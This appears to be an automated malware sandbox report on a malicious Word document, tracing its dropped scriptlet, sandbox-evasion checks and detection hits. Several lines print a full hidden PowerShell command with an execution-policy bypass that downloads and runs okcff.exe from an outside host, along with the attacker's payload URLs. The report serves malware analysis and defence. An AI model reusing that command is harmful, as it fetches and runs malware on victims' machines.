                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 14 Jan 2022 09:23:22 GMTContent-Type: application/x-msdownloadContent-Length: 194560Last-Modified: Fri, 14 Jan 2022 05:56:32 GMTConnection: keep-aliveETag: "61e11090-2f800"Accept-Ranges: bytes
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 14 Jan 2022 09:23:23 GMTContent-Type: application/x-msdownloadContent-Length: 194560Last-Modified: Fri, 14 Jan 2022 05:56:32 GMTConnection: keep-aliveETag: "61e11090-2f800"Accept-Ranges: bytes
                    Source: global trafficHTTP traffic detected: GET /okcff.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: mitmar-pl.comConnection: Keep-Alive
                    Source: notepad.exe, 00000018.00000002.700250949.0000000002E00000.00000002.00020000.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
                    Source: powershell.exe, 00000005.00000002.444344400.000000000370C000.00000004.00000001.sdmpString found in binary or memory: httP://mitmar-pl.com/ok
                    Source: powershell.exe, 00000005.00000002.444344400.000000000370C000.00000004.00000001.sdmpString found in binary or memory: httP://mitmar-pl.com/okcff.ex
                    Source: powershell.exe, 00000005.00000002.444344400.000000000370C000.00000004.00000001.sdmpString found in binary or memory: httP://mitmar-pl.com/okcff.exe
                    Source: powershell.exe, 00000003.00000002.440935004.000000000371C000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.444344400.000000000370C000.00000004.00000001.sdmpString found in binary or memory: httP://mitmar-pl.com/okcff.exePE
                    Source: notepad.exe, 00000018.00000002.700250949.0000000002E00000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com
                    Source: notepad.exe, 00000018.00000002.700250949.0000000002E00000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com/
                    Source: powershell.exe, 00000003.00000002.440935004.000000000371C000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.441337667.0000000003819000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.621297461.00000000022C1000.00000004.00000001.sdmpString found in binary or memory: http://mitmar-pl.com
                    Source: okcff.exeString found in binary or memory: http://mitmar-pl.com/Crkrqdrd.jpeg
                    Source: okcff.exe, 00000009.00000000.439195914.00000000009F2000.00000020.00020000.sdmp, okcff.exe, 00000009.00000002.620997931.00000000009F2000.00000020.00020000.sdmpString found in binary or memory: http://mitmar-pl.com/Crkrqdrd.jpegi
                    Source: powershell.exe, 00000003.00000002.440935004.000000000371C000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.444532419.000000001B5C6000.00000004.00000001.sdmpString found in binary or memory: http://mitmar-pl.com/okcff.exe
                    Source: powershell.exe, 00000003.00000002.437210048.00000000023B0000.00000002.00020000.sdmp, powershell.exe, 00000005.00000002.438620831.0000000002450000.00000002.00020000.sdmp, okcff.exe, 00000009.00000002.624048048.0000000004D70000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                    Source: okcff.exe, 00000009.00000002.621297461.00000000022C1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe, 00000003.00000002.437210048.00000000023B0000.00000002.00020000.sdmp, powershell.exe, 00000005.00000002.438620831.0000000002450000.00000002.00020000.sdmp, okcff.exe, 00000009.00000002.624048048.0000000004D70000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
                    Source: notepad.exe, 00000018.00000002.700250949.0000000002E00000.00000002.00020000.sdmpString found in binary or memory: http://www.hotmail.com/oe
                    Source: notepad.exe, 00000018.00000002.700250949.0000000002E00000.00000002.00020000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
                    Source: powershell.exe, 00000005.00000002.438200981.00000000003EF000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/cclean
                    Source: powershell.exe, 00000005.00000002.438200981.00000000003EF000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleanerv
                    Source: notepad.exe, 00000018.00000002.700250949.0000000002E00000.00000002.00020000.sdmpString found in binary or memory: http://www.windows.com/pctv.
                    Source: okcff.exe, 00000009.00000002.621777237.0000000002543000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623349353.000000000334B000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.628221985.00000000051D0000.00000004.00020000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                    Source: okcff.exe, 00000009.00000002.621777237.0000000002543000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623349353.000000000334B000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.628221985.00000000051D0000.00000004.00020000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                    Source: okcff.exe, 00000009.00000002.621777237.0000000002543000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623349353.000000000334B000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.628221985.00000000051D0000.00000004.00020000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                    Source: okcff.exeString found in binary or memory: https://google.com
                    Source: okcff.exe, 00000009.00000002.621297461.00000000022C1000.00000004.00000001.sdmpString found in binary or memory: https://google.com/
                    Source: okcff.exe, 00000009.00000002.621297461.00000000022C1000.00000004.00000001.sdmpString found in binary or memory: https://google.comD
                    Source: okcff.exe, 00000009.00000002.621777237.0000000002543000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623349353.000000000334B000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.628221985.00000000051D0000.00000004.00020000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                    Source: okcff.exe, 00000009.00000002.621777237.0000000002543000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623349353.000000000334B000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.621327809.00000000022E7000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.628221985.00000000051D0000.00000004.00020000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                    Source: okcff.exe, 00000009.00000002.623349353.000000000334B000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.628221985.00000000051D0000.00000004.00020000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                    Source: okcff.exe, 00000009.00000002.621777237.0000000002543000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623598488.00000000034DF000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623703216.0000000003587000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{5349C035-C6A0-4C16-B632-E1A36FB414FC}.tmp
                    Source: unknownDNS traffic detected: queries for: mitmar-pl.com
                    Source: global trafficHTTP traffic detected: GET /okcff.exe HTTP/1.1Host: mitmar-pl.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /okcff.exe HTTP/1.1Host: mitmar-pl.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /Crkrqdrd.jpeg HTTP/1.1Host: mitmar-pl.comConnection: Keep-Alive

                    System Summary:

                    Microsoft Office creates scripting files
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT
                    Office process drops PE file
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\okcff[1].exe
                    Document contains OLE streams with names of living off the land binaries
                    Source: ~WRF{FEB62F73-6B26-43D9-9B3A-2E996B481DC3}.tmp.0.drStream path '_1703660897/\x1Ole10Native' : 4{....abdtfhgXgeghDp..ScT.C:\nsdsTggH\abdtfhgXGeghDp..ScT..... ...C:\CbkepaD.\abdtfhghgeghDp..ScT.<
                    Source: ~WRF{FEB62F73-6B26-43D9-9B3A-2E996B481DC3}.tmp.0.drStream path '_1703660925/\x1Ole10Native' : $|....abdtfhgXgeghDp..ScT.C:\nsdsTggH\abdtfhgXGeghDp..ScT.....6...C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp..ScT..z
                    Document contains a stream with embedded javascript code
                    Source: ~WRF{FEB62F73-6B26-43D9-9B3A-2E996B481DC3}.tmp.0.drStream path '_1703660897/\x1Ole10Native' : Found JS content: 4{....abdtfhgXgeghDp..ScT.C:\nsdsTggH\abdtfhgXGeghDp..ScT..... ...C:\CbkepaD.\abdtfhghgeghDp..ScT.<
                    Source: ~WRF{FEB62F73-6B26-43D9-9B3A-2E996B481DC3}.tmp.0.drStream path '_1703660925/\x1Ole10Native' : Found JS content: $|....abdtfhgXgeghDp..ScT.C:\nsdsTggH\abdtfhgXGeghDp..ScT.....6...C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp..ScT..z
                    Powershell drops PE file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\okcff.exe
                    .NET source code contains very large array initializations
                    Source: 41.0.okcff.exe.400000.5.unpack, <PrivateImplementationDetails>{FF1D0D87-84BB-46D1-97D2-B6B1FCD58796}/252DC26E-1C55-40FB-95BA-CAC79903EF30.csLarge array initialization: .cctor: array initializer size 11933
                    Source: 41.0.okcff.exe.400000.7.unpack, <PrivateImplementationDetails>{FF1D0D87-84BB-46D1-97D2-B6B1FCD58796}/252DC26E-1C55-40FB-95BA-CAC79903EF30.csLarge array initialization: .cctor: array initializer size 11933
                    Source: 41.0.okcff.exe.400000.9.unpack, <PrivateImplementationDetails>{FF1D0D87-84BB-46D1-97D2-B6B1FCD58796}/252DC26E-1C55-40FB-95BA-CAC79903EF30.csLarge array initialization: .cctor: array initializer size 11933
                    Source: 41.0.okcff.exe.400000.13.unpack, <PrivateImplementationDetails>{FF1D0D87-84BB-46D1-97D2-B6B1FCD58796}/252DC26E-1C55-40FB-95BA-CAC79903EF30.csLarge array initialization: .cctor: array initializer size 11933
                    Found suspicious RTF objects
                    Source: abdtfhgXgeghDp.ScTStatic RTF information: Object: 0 Offset: 000007CDh abdtfhgXgeghDp.ScT
                    Source: 9.2.okcff.exe.334b4b0.4.raw.unpack, type: UNPACKEDPEMatched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
                    Source: 00000005.00000002.438152998.00000000003A0000.00000004.00000020.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
                    Source: 00000003.00000002.436663453.0000000000380000.00000004.00000020.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
                    Source: ~WRF{FEB62F73-6B26-43D9-9B3A-2E996B481DC3}.tmp.0.drOLE indicator application name: unknown
                    Source: ~WRF{FEB62F73-6B26-43D9-9B3A-2E996B481DC3}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                    Source: ~WRF{FEB62F73-6B26-43D9-9B3A-2E996B481DC3}.tmp.0.drOLE indicator has summary info: false
                    Source: okcff[1].exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: okcff.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: C:\Users\user\AppData\Roaming\okcff.exeMemory allocated: 76F90000 page execute and read and write
                    Source: C:\Users\user\AppData\Roaming\okcff.exeMemory allocated: 76E90000 page execute and read and write
                    Source: C:\Windows\SysWOW64\timeout.exeMemory allocated: 76F90000 page execute and read and write
                    Source: C:\Windows\SysWOW64\timeout.exeMemory allocated: 76E90000 page execute and read and write
                    Source: 478644.doc Virustotal: Detection: 41%
                    Source: 478644.doc ReversingLabs: Detection: 30%
                    Source: C:\Users\user\AppData\Roaming\okcff.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\okcff.exe "C:\Users\user\AppData\Roaming\okcff.exe"
                    Source: C:\Users\user\AppData\Roaming\okcff.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2
                    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 2
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\verclsid.exe "C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\notepad.exe C:\Windows\system32\NOTEPAD.EXE" "C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT
                    Source: C:\Users\user\AppData\Roaming\okcff.exe Process created: C:\Users\user\AppData\Roaming\okcff.exe C:\Users\user\AppData\Roaming\okcff.exe
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Users\user\AppData\Roaming\okcff.exe "C:\Users\user\AppData\Roaming\okcff.exe"
                    Source: C:\Windows\System32\verclsid.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{06290BD2-48AA-11D2-8432-006008C3FBFC}\InprocServer32
                    Source: C:\Users\user\AppData\Roaming\okcff.exe; WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; File created: C:\Users\user\Desktop\~$478644.doc
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; File created: C:\Users\user\AppData\Local\Temp\CVRF70A.tmp
                    Source: classification engine; Classification label: mal100.troj.expl.evad.winDOC@53/21@4/1
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; File read: C:\Users\desktop.ini
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                    Source: C:\Users\user\AppData\Roaming\okcff.exe; Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                    Source: notepad.exe, 00000018.00000002.700250949.0000000002E00000.00000002.00020000.sdmp; Binary or memory string: .VBPud<_
                    Source: ~WRF{FEB62F73-6B26-43D9-9B3A-2E996B481DC3}.tmp.0.dr; OLE document summary: title field not present or empty
                    Source: ~WRF{FEB62F73-6B26-43D9-9B3A-2E996B481DC3}.tmp.0.dr; OLE document summary: author field not present or empty
                    Source: ~WRF{FEB62F73-6B26-43D9-9B3A-2E996B481DC3}.tmp.0.dr; OLE document summary: edited time not present or 0
                    Source: 41.0.okcff.exe.400000.5.unpack, A/b2.cs; Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 41.0.okcff.exe.400000.7.unpack, A/b2.cs; Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 41.0.okcff.exe.400000.9.unpack, A/b2.cs; Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\AppData\Roaming\okcff.exe; File read: C:\Windows\System32\drivers\etc\hosts
                    Source: Window Recorder; Window detected: More than 3 window changes detected
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                    Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.437963370.0000000002C67000.00000004.00000040.sdmp
                    Source: Binary string: System.Management.Automation.pdbBBa?p source: powershell.exe, 00000003.00000002.437963370.0000000002C67000.00000004.00000040.sdmp
                    Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbAlbu source: powershell.exe, 00000003.00000002.437963370.0000000002C67000.00000004.00000040.sdmp
                    Source: Binary string: mscorlib.pdb source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
                    Source: Binary string: :\Windows\mscorlib.pdb source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
                    Source: Binary string: mscorlib.pdbment.Automation.pdbBB source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
                    Source: Binary string: m.Management.Automation.pdbpdbion.pdbAlbu source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
                    Source: Binary string: scorlib.pdb source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
                    Source: Binary string: :\Windows\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
                    Source: Binary string: ws\dll\System.pdben source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdbn source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
                    Source: Binary string: protobuf-net.pdbSHA256 source: okcff.exe, 00000009.00000002.621777237.0000000002543000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623349353.000000000334B000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.628221985.00000000051D0000.00000004.00020000.sdmp
                    Source: Binary string: protobuf-net.pdb source: okcff.exe, 00000009.00000002.621777237.0000000002543000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623349353.000000000334B000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.628221985.00000000051D0000.00000004.00020000.sdmp
                    Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.437963370.0000000002C67000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbmmon source: powershell.exe, 00000003.00000002.437963370.0000000002C67000.00000004.00000040.sdmp, powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb Fil source: powershell.exe, 00000003.00000002.437963370.0000000002C67000.00000004.00000040.sdmp, powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.437963370.0000000002C67000.00000004.00000040.sdmp, powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
                    Source: Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\System.pdb source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
                    Source: ~WRF{FEB62F73-6B26-43D9-9B3A-2E996B481DC3}.tmp.0.dr; Initial sample: OLE indicators vbamacros = False

                    Data Obfuscation:

                    Yara detected Costura Assembly Loader
                    Source: Yara match; File source: 9.2.okcff.exe.1e30000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 9.2.okcff.exe.35871d0.8.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 9.2.okcff.exe.1e30000.1.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 9.2.okcff.exe.35871d0.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 00000009.00000002.623662053.000000000356F000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000009.00000002.621443805.00000000023AD000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000009.00000002.623703216.0000000003587000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000009.00000002.621327809.00000000022E7000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000009.00000002.621033509.0000000001E30000.00000004.00020000.sdmp, type: MEMORY
                    Source: Yara match; File source: Process Memory Space: okcff.exe PID: 2656, type: MEMORYSTR
                    Suspicious powershell command line found
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'
                    Source: C:\Users\user\AppData\Roaming\okcff.exe; Code function: 9_2_003D863D pushfd ; ret 9_2_003D8641
                    Source: C:\Users\user\AppData\Roaming\okcff.exe; Code function: 9_2_003D7F95 pushad ; retn 001Ch 9_2_003D7F99
                    Source: C:\Users\user\AppData\Roaming\okcff.exe; Code function: 9_2_003D7FF5 pushfd ; retn 001Ch 9_2_003D8049
                    Source: C:\Users\user\AppData\Roaming\okcff.exe; Code function: 9_2_003D87E0 pushad ; ret 9_2_003D8849
                    Source: C:\Users\user\AppData\Roaming\okcff.exe; Code function: 9_2_0211EBEB push esp; retn 001Ch 9_2_0211EBF5
                    Source: C:\Users\user\AppData\Roaming\okcff.exe; Code function: 9_2_02181163 pushad ; ret 9_2_02181429
                    Source: C:\Users\user\AppData\Roaming\okcff.exe; Code function: 9_2_02181464 pushad ; ret 9_2_02181429
                    Source: C:\Users\user\AppData\Roaming\okcff.exe; Code function: 9_2_02189840 push FFFFFF8Bh; ret 9_2_02189843
                    Source: C:\Users\user\AppData\Roaming\okcff.exe; Code function: 9_2_021ABD19 pushfd ; iretd 9_2_021ABD25
                    Source: C:\Users\user\AppData\Roaming\okcff.exe; Code function: 9_2_054297B4 push 850FD83Bh; ret 9_2_054297C1
                    Source: okcff[1].exe.0.dr; Static PE information: 0xF603599A [Sun Oct 17 00:04:42 2100 UTC]

                    Persistence and Installation Behavior:

                    Tries to download and execute files (via powershell)
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File created: C:\Users\user\AppData\Roaming\okcff.exe
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\okcff[1].exe
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; Process information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\verclsid.exe, Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\verclsid.exe, Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX

                    Malware Analysis System Evasion:

                    Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                    Source: C:\Users\user\AppData\Roaming\okcff.exe, WMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
                    Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
                    Source: C:\Users\user\AppData\Roaming\okcff.exe, WMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2200, Thread sleep time: -60000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1200, Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2228, Thread sleep time: -60000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2932, Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2644, Thread sleep time: -60000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2416, Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\okcff.exe TID: 1592, Thread sleep time: -33000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\okcff.exe TID: 1724, Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\okcff.exe TID: 308, Thread sleep time: -300000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\okcff.exe TID: 2108, Thread sleep time: -7378697629483816s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\okcff.exe TID: 2108, Thread sleep time: -120000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\okcff.exe TID: 2292, Thread sleep count: 302 > 30
                    Source: C:\Users\user\AppData\Roaming\okcff.exe TID: 1012, Thread sleep count: 9438 > 30
                    Source: C:\Users\user\AppData\Roaming\okcff.exe TID: 2108, Thread sleep count: 101 > 30
